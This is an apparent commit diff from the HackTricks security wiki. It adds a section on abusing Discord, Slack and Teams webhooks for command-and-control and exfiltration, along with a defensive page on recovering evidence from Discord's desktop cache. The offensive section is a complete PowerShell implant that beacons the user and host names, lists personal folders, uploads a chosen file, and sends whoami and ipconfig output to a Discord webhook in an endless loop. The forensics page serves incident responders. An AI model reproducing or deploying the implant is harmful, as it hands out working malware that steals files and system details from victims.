mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1410 from HackTricks-wiki/update_Discord_as_a_C2_and_the_cached_evidence_left_behin_20250916_125230
Discord as a C2 and the cached evidence left behind
This commit is contained in:
		
						commit
						bacfd40952
					
				| @ -59,6 +59,7 @@ | ||||
|     - [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) | ||||
|     - [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md) | ||||
|     - [Deofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md) | ||||
|     - [Discord Cache Forensics](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md) | ||||
|     - [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md) | ||||
|     - [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md) | ||||
|     - [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md) | ||||
|  | ||||
| @ -112,6 +112,93 @@ if __name__ == "__main__": | ||||
| ### | ||||
| ``` | ||||
| 
 | ||||
| ## Webhooks (Discord/Slack/Teams) for C2 & Data Exfiltration | ||||
| 
 | ||||
| Webhooks are write-only HTTPS endpoints that accept JSON and optional file parts. They’re commonly allowed to trusted SaaS domains and require no OAuth/API keys, making them useful for low-friction beaconing and exfiltration. | ||||
| 
 | ||||
| Key ideas: | ||||
| - Endpoint: Discord uses https://discord.com/api/webhooks/<id>/<token> | ||||
| - POST multipart/form-data with a part named payload_json containing {"content":"..."} and optional file part(s) named file. | ||||
| - Operator loop pattern: periodic beacon -> directory recon -> targeted file exfil -> recon dump -> sleep. HTTP 204 NoContent/200 OK confirm delivery. | ||||
| 
 | ||||
| PowerShell PoC (Discord): | ||||
| 
 | ||||
| ```powershell | ||||
| # 1) Configure webhook and optional target file | ||||
| $webhook = "https://discord.com/api/webhooks/YOUR_WEBHOOK_HERE" | ||||
| $target  = Join-Path $env:USERPROFILE "Documents\SENSITIVE_FILE.bin" | ||||
| 
 | ||||
| # 2) Reuse a single HttpClient | ||||
| $client = [System.Net.Http.HttpClient]::new() | ||||
| 
 | ||||
| function Send-DiscordText { | ||||
|     param([string]$Text) | ||||
|     $payload = @{ content = $Text } | ConvertTo-Json -Compress | ||||
|     $jsonContent = New-Object System.Net.Http.StringContent($payload, [System.Text.Encoding]::UTF8, "application/json") | ||||
|     $mp = New-Object System.Net.Http.MultipartFormDataContent | ||||
|     $mp.Add($jsonContent, "payload_json") | ||||
|     $resp = $client.PostAsync($webhook, $mp).Result | ||||
|     Write-Host "[Discord] text -> $($resp.StatusCode)" | ||||
| } | ||||
| 
 | ||||
| function Send-DiscordFile { | ||||
|     param([string]$Path, [string]$Name) | ||||
|     if (-not (Test-Path $Path)) { return } | ||||
|     $bytes = [System.IO.File]::ReadAllBytes($Path) | ||||
|     $fileContent = New-Object System.Net.Http.ByteArrayContent(,$bytes) | ||||
|     $fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream") | ||||
|     $json = @{ content = ":package: file exfil: $Name" } | ConvertTo-Json -Compress | ||||
|     $jsonContent = New-Object System.Net.Http.StringContent($json, [System.Text.Encoding]::UTF8, "application/json") | ||||
|     $mp = New-Object System.Net.Http.MultipartFormDataContent | ||||
|     $mp.Add($jsonContent, "payload_json") | ||||
|     $mp.Add($fileContent, "file", $Name) | ||||
|     $resp = $client.PostAsync($webhook, $mp).Result | ||||
|     Write-Host "[Discord] file $Name -> $($resp.StatusCode)" | ||||
| } | ||||
| 
 | ||||
| # 3) Beacon/recon/exfil loop | ||||
| $ctr = 0 | ||||
| while ($true) { | ||||
|     $ctr++ | ||||
|     # Beacon | ||||
|     $beacon = "━━━━━━━━━━━━━━━━━━`n:satellite: Beacon`n```User: $env:USERNAME`nHost: $env:COMPUTERNAME```" | ||||
|     Send-DiscordText -Text $beacon | ||||
| 
 | ||||
|     # Every 2nd: quick folder listing | ||||
|     if ($ctr % 2 -eq 0) { | ||||
|         $dirs = @("Documents","Desktop","Downloads","Pictures") | ||||
|         $acc = foreach ($d in $dirs) { | ||||
|             $p = Join-Path $env:USERPROFILE $d | ||||
|             $items = Get-ChildItem -Path $p -ErrorAction SilentlyContinue | Select-Object -First 3 -ExpandProperty Name | ||||
|             if ($items) { "`n$d:`n - " + ($items -join "`n - ") } | ||||
|         } | ||||
|         Send-DiscordText -Text (":file_folder: **User Dirs**`n━━━━━━━━━━━━━━━━━━`n```" + ($acc -join "") + "```") | ||||
|     } | ||||
| 
 | ||||
|     # Every 3rd: targeted exfil | ||||
|     if ($ctr % 3 -eq 0) { Send-DiscordFile -Path $target -Name ([IO.Path]::GetFileName($target)) } | ||||
| 
 | ||||
|     # Every 4th: basic recon | ||||
|     if ($ctr % 4 -eq 0) { | ||||
|         $who = whoami | ||||
|         $ip  = ipconfig | Out-String | ||||
|         $tmp = Join-Path $env:TEMP "recon.txt" | ||||
|         "whoami:: $who`r`nIPConfig::`r`n$ip" | Out-File -FilePath $tmp -Encoding utf8 | ||||
|         Send-DiscordFile -Path $tmp -Name "recon.txt" | ||||
|     } | ||||
| 
 | ||||
|     Start-Sleep -Seconds 20 | ||||
| } | ||||
| ``` | ||||
| 
 | ||||
| Notes: | ||||
| - Similar patterns apply to other collaboration platforms (Slack/Teams) using their incoming webhooks; adjust URL and JSON schema accordingly. | ||||
| - For DFIR of Discord Desktop cache artifacts and webhook/API recovery, see: | ||||
| 
 | ||||
| {{#ref}} | ||||
| ../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| ## FTP | ||||
| 
 | ||||
| ### FTP server (python) | ||||
| @ -364,7 +451,10 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be | ||||
| 
 | ||||
| - [https://github.com/Stratiz/DNS-Exfil](https://github.com/Stratiz/DNS-Exfil) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/) | ||||
| - [Discord Webhooks – Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook) | ||||
| - [Discord Forensic Suite (cache parser)](https://github.com/jwdfir/discord_cache_parser) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
| @ -80,6 +80,12 @@ Within these directories, most user data can be found in the **Default/** or **C | ||||
| - **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads. | ||||
| - **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available. | ||||
| - **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). | ||||
| 
 | ||||
|   Electron-based desktop apps (e.g., Discord) also use Chromium Simple Cache and leave rich on-disk artifacts. See: | ||||
| 
 | ||||
|   {{#ref}} | ||||
|   discord-cache-forensics.md | ||||
|   {{#endref}} | ||||
| - **Bookmarks**: User bookmarks. | ||||
| - **Web Data**: Contains form history. | ||||
| - **Favicons**: Stores website favicons. | ||||
|  | ||||
| @ -0,0 +1,91 @@ | ||||
| # Discord Cache Forensics (Chromium Simple Cache) | ||||
| 
 | ||||
| {{#include ../../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| This page summarizes how to triage Discord Desktop cache artifacts to recover exfiltrated files, webhook endpoints, and activity timelines. Discord Desktop is an Electron/Chromium app and uses Chromium Simple Cache on disk. | ||||
| 
 | ||||
| ## Where to look (Windows/macOS/Linux) | ||||
| 
 | ||||
| - Windows: %AppData%\discord\Cache\Cache_Data | ||||
| - macOS: ~/Library/Application Support/discord/Cache/Cache_Data | ||||
| - Linux: ~/.config/discord/Cache/Cache_Data | ||||
| 
 | ||||
| Key on‑disk structures inside Cache_Data: | ||||
| - index: Simple Cache index database | ||||
| - data_#: Binary cache block files that can contain multiple cached objects | ||||
| - f_######: Individual cached entries stored as standalone files (often larger bodies) | ||||
| 
 | ||||
| Note: Deleting messages/channels/servers in Discord does not purge this local cache. Cached items often remain and their file timestamps align with user activity, enabling timeline reconstruction. | ||||
| 
 | ||||
| ## What can be recovered | ||||
| 
 | ||||
| - Exfiltrated attachments and thumbnails fetched via cdn.discordapp.com/media.discordapp.net | ||||
| - Images, GIFs, videos (e.g., .jpg, .png, .gif, .webp, .mp4, .webm) | ||||
| - Webhook URLs (https://discord.com/api/webhooks/…) | ||||
| - Discord API calls (https://discord.com/api/vX/…) | ||||
| - Helpful for correlating beaconing/exfil activity and hashing media for intel matching | ||||
| 
 | ||||
| ## Quick triage (manual) | ||||
| 
 | ||||
| - Grep cache for high-signal artifacts: | ||||
|   - Webhook endpoints: | ||||
|     - Windows: findstr /S /I /C:"https://discord.com/api/webhooks/" "%AppData%\discord\Cache\Cache_Data\*" | ||||
|     - Linux/macOS: strings -a Cache_Data/* | grep -i "https://discord.com/api/webhooks/" | ||||
|   - Attachment/CDN URLs: | ||||
|     - strings -a Cache_Data/* | grep -Ei "https://(cdn|media)\.discord(app)?\.com/attachments/" | ||||
|   - Discord API calls: | ||||
|     - strings -a Cache_Data/* | grep -Ei "https://discord(app)?\.com/api/v[0-9]+/" | ||||
| - Sort cached entries by modified time to build a quick timeline (mtime reflects when the object hit cache): | ||||
|   - Windows PowerShell: Get-ChildItem "$env:AppData\discord\Cache\Cache_Data" -File -Recurse | Sort-Object LastWriteTime | Select-Object LastWriteTime, FullName | ||||
| 
 | ||||
| ## Parsing f_* entries (HTTP body + headers) | ||||
| 
 | ||||
| Files starting with f_ contain HTTP response headers followed by the body. The header block typically ends with \r\n\r\n. Useful response headers include: | ||||
| - Content-Type: To infer media type | ||||
| - Content-Location or X-Original-URL: Original remote URL for preview/correlation | ||||
| - Content-Encoding: May be gzip/deflate/br (Brotli) | ||||
| 
 | ||||
| Media can be extracted by splitting headers from body and optionally decompressing based on Content-Encoding. Magic-byte sniffing is useful when Content-Type is absent. | ||||
| 
 | ||||
| ## Automated DFIR: Discord Forensic Suite (CLI/GUI) | ||||
| 
 | ||||
| - Repo: https://github.com/jwdfir/discord_cache_parser | ||||
| - Function: Recursively scans Discord’s cache folder, finds webhook/API/attachment URLs, parses f_* bodies, optionally carves media, and outputs HTML + CSV timeline reports with SHA‑256 hashes. | ||||
| 
 | ||||
| Example CLI usage: | ||||
| 
 | ||||
| ```bash | ||||
| # Acquire cache (copy directory for offline parsing), then run: | ||||
| python3 discord_forensic_suite_cli \ | ||||
|   --cache "%AppData%\discord\Cache\Cache_Data" \ | ||||
|   --outdir C:\IR\discord-cache \ | ||||
|   --output discord_cache_report \ | ||||
|   --format both \ | ||||
|   --timeline \ | ||||
|   --extra \ | ||||
|   --carve \ | ||||
|   --verbose | ||||
| ``` | ||||
| 
 | ||||
| Key options: | ||||
| - --cache: Path to Cache_Data | ||||
| - --format html|csv|both | ||||
| - --timeline: Emit ordered CSV timeline (by modified time) | ||||
| - --extra: Also scan sibling Code Cache and GPUCache | ||||
| - --carve: Carve media from raw bytes near regex hits (images/video) | ||||
| - Output: HTML report, CSV report, CSV timeline, and a media folder with carved/extracted files | ||||
| 
 | ||||
| ## Analyst tips | ||||
| 
 | ||||
| - Correlate the modified time (mtime) of f_* and data_* files with user/attacker activity windows to reconstruct a timeline. | ||||
| - Hash recovered media (SHA-256) and compare against known-bad or exfil datasets. | ||||
| - Extracted webhook URLs can be tested for liveness or rotated; consider adding them to blocklists and retro-hunting proxies. | ||||
| - Cache persists after “wiping” on the server side. If acquisition is possible, collect the entire Cache directory and related sibling caches (Code Cache, GPUCache). | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/) | ||||
| - [Discord Forensic Suite (CLI/GUI)](https://github.com/jwdfir/discord_cache_parser) | ||||
| - [Discord Webhooks – Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook) | ||||
| 
 | ||||
| {{#include ../../../banners/hacktricks-training.md}} | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user